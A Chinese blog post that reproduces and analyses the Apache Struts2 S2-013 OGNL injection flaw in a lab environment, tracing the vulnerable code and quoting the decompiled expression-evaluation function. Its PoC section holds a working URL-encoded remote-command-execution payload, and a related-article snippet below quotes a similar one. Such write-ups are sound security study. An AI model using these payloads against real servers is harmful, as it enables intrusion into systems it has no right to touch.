S2-013的一次逐步复现分析

最新推荐文章于 2024-04-06 10:48:21 发布
最新推荐文章于 2024-04-06 10:48:21 发布
阅读量435 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jary__D/article/details/128069429
版权

java 开发语言

描述

https://cwiki.apache.org/confluence/display/WW/S2-013

struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值

  1. none - URL中包含任何参数(默认)
  2. get - 仅包含URL中的GET参数
  3. all - 在URL中包含GET和POST参数

当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。

此时<s:a> 或<s:url>尝试去解析原始请求参数时,会导致OGNL表达式的执行

环境搭建

docker

漏洞分析

在这里进行预处理URL处理

这里的beforeRenderUrl会对我们的URI 进行解码

处理结束后回到处理URL的地方,这里renderUrl就是触发的关键函数了

这句话执行了我们的payload

继续跟进触发点,这里会遍历我们所有的参数 URI, 参数名和参数值村发到ActionMapping对象里面

buildUrl里面处理一直到buildParameterString

将ActionMapping对象取出来存放到Iterator对象然后进一步处理

在这个函数里面会对我们的Iterator的key-value进一步处理,也就是对我们的参数和参数名字惊醒处理

优先处理表达式的格式,也就是对ONGL表达式进行匹配

然后再这里的,和之前的Struts2漏洞一样,利用stack.findValue执行了命令

命令执行的代码

public static Object translateVariables(char[] openChars, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator, int maxLoopCount) {
        Object result = expression;
        char[] arr$ = openChars;
        int len$ = openChars.length;

        for(int i$ = 0; i$ < len$; ++i$) {
            char open = arr$[i$];
            int loopCount = 1;
            int pos = 0;
            String lookupChars = open + "{";

            while(true) {
                int start = expression.indexOf(lookupChars, pos);
                if (start == -1) {
                    int pos = false;
                    ++loopCount;
                    start = expression.indexOf(lookupChars);
                }

                if (loopCount > maxLoopCount) {
                    break;
                }

                int length = expression.length();
                int x = start + 2;
                int count = 1;

                while(start != -1 && x < length && count != 0) {
                    char c = expression.charAt(x++);
                    if (c == '{') {
                        ++count;
                    } else if (c == '}') {
                        --count;
                    }
                }

                int end = x - 1;
                if (start == -1 || end == -1 || count != 0) {
                    break;
                }

                String var = expression.substring(start + 2, end);
                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                    o = evaluator.evaluate(o);
                }

                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                String middle = null;
                if (o != null) {
                    middle = o.toString();
                    if (StringUtils.isEmpty(left)) {
                        result = o;
                    } else {
                        result = left.concat(middle);
                    }

                    if (StringUtils.isNotEmpty(right)) {
                        result = result.toString().concat(right);
                    }

                    expression = left.concat(middle).concat(right);
                } else {
                    expression = left.concat(right);
                    result = expression;
                }

                pos = (left != null && left.length() > 0 ? left.length() - 1 : 0) + (middle != null && middle.length() > 0 ? middle.length() - 1 : 0) + 1;
                pos = Math.max(pos, 1);
            }
        }

        XWorkConverter conv = (XWorkConverter)((Container)stack.getContext().get("com.opensymphony.xwork2.ActionContext.container")).getInstance(XWorkConverter.class);
        return conv.convertValue(stack.getContext(), result, asType);
    }

漏洞复现

poc

http://192.168.1.12:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27calc%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%2bnew%20java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D

参考文章

https://blog.csdn.net/Fly_hps/article/details/85034215

Nuad
关注
专栏目录
【图像去噪】论文精读:Learning Enriched Features for Real Image Restoration and Enhancement(MIRNet)
畅游计算机视觉的海洋
09-13 16
论文题目:Learning Enriched Features for Real Image Restoration and Enhancement —— 变分去噪网络:面向盲噪声建模和去除ECCV 2020!新颖模型结构!去噪、超分、增强通用模型!图像恢复由于其退化版本恢复高质量的图像内容,具有广泛的应用,如监视、计算摄影、医学成像和遥感。最近,卷积神经网络 (CNN) 在图像恢复任务的传统方法上取得了显着改进。现有的基于 CNN 的方法通常在全分辨率或逐步低分辨率表示上运行。
Struts2 S2-013复现
ZJT6666666的博客
12-22 270
Struts2 S2-013复现
struts2远程S2-013复现学习
hklearner的博客
04-02 299
S2-013复现 原理 struts2的标签中 和 都有一个 includeParams 属性,可以设置成如下值 none - URL中不包含任何参数(默认) get - 仅包含URL中的GET参数 all - 在URL中包含GET和POST参数 此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 影响版本:Struts 2.0.0-2.3.14 漏洞搭建 Struts2 的标签<s:a>和<s:url>提供了一个 includeParams 属性。该属性的主要作用域
漏洞复现----33、Struts2/S2-013/S2-014
七天
06-29 486
文章目录一、漏洞原理二、环境启动三、漏洞复现四、S2-014 一、漏洞原理 S2-013Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,可以设置成如下值: 1、none - URL中不包含任何参数(默认) 2、get - 仅包含URL中的GET参数 3、all - 在URL中包含GET和POST参数此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 需要在JSP页面中将s:url、s:a标签中的includeP
Struts2远程代码执行漏洞分析S2-013)1
08-08
Struts2远程代码执行漏洞分析S2-013)1
buuctf [struts2]s2-013
qq_1873822的博客
03-16 823
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
系统性能分析从入门到进阶
阿里巴巴中间件
04-06 357
作者 | 勿非 本文以系统为中心, 结合日常工作和用例, 由浅入深地介绍了性能分析的一些方法和体会, 希望对想了解系统性能分析的同学有所帮助。 入门篇 资源角度 USE 产品跑在系统的各种资源上面, 从系统资源的角度入门性能分析是个不错的选择, 我们以业界知名大牛 Brendan Gregg 的 USE 方法开始, USE 特点就是简单有效适合入门, 用 Brendan 的话描述 USE 的效果: I find it solves about 80% of server issues with 5% of
BAT高手面试总结-技术笔记_202.pdf
08-23
当发现一个问题时,需要通过日志分析、网络抓包、模拟器复现等方式来定位是APP端还是服务端的问题。如果问题难以确定,可以采用逐步缩小问题范围的方法,比如在不同环境或设备上测试,或者与开发人员合作进行调试。 ...
RISC-V生态架构浅析(认识RISC-V)
JKX_geek的博客
02-27 3285
Java/C/C++/机器学习/算法与数据结构/前端/安卓/Python/程序员必读技术书单大全: 书单导航页(点击右侧小资源即可打开个人博客):技术书栈 =====>>【Java大牛带你入门到进阶之路】<<==== 天下没有不劳而获的果实,望各位年轻的朋友,想学技术的朋友,在决心扎入技术道路的路上披荆斩棘,把书弄懂了,再去敲代码,把原理弄懂了,再去实践,将会带给...
[struts2]s2-013 漏洞复现
satasun的博客
12-09 575
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
BUUCTF-Real-[struts2]s2-013
分享
02-03 453
s2-013中,因为参数的问题导致rce漏洞的出现!
Apache Struts2远程代码执行漏洞(S2-013)
weixin_47493074的博客
09-19 470
Apache Struts2(S2-013)
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
最新发布
yougexiaojiuguan的博客
04-06 545
漏洞复现过程的记录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 508
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2716
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
S2-013 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 2682
前言 S2-014是对于S2-013修复不完整的造成的漏洞,会在漏洞分析中提到,所以文本的主要分析的还是S2-013 而且在分析的时候,发现参考网上资料时对于漏洞触发逻辑的一些错误 至少目前我自己是那么认为的:) 漏洞环境根据vulhub修改而来,环境地址 https://github.com/kingkaki/Struts2-Vulenv,感兴趣的师傅可以一起分析下 若有疏漏,还望多多指...
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1864
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
zr1213159840的博客
01-15 1683
首先查找到漏洞的相关利用信息,链接如下: https://vulhub.org/#/environments/struts2/s2-013/ 能看到poc如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1741
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts 2.0.0-2.1.8.1。你可以在vulhub的GitHub仓库中找到搭建了该漏洞的示例环境。首先,你可以使用能够爆出路径的payload验证目标网址是否存在s2-005漏洞。然后,使用执行代码的payload进行利用。需要注意的是,不同的博主可能会提供不同的payload,所以如果一个payload无法利用,可以尝试其他的payload。 关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值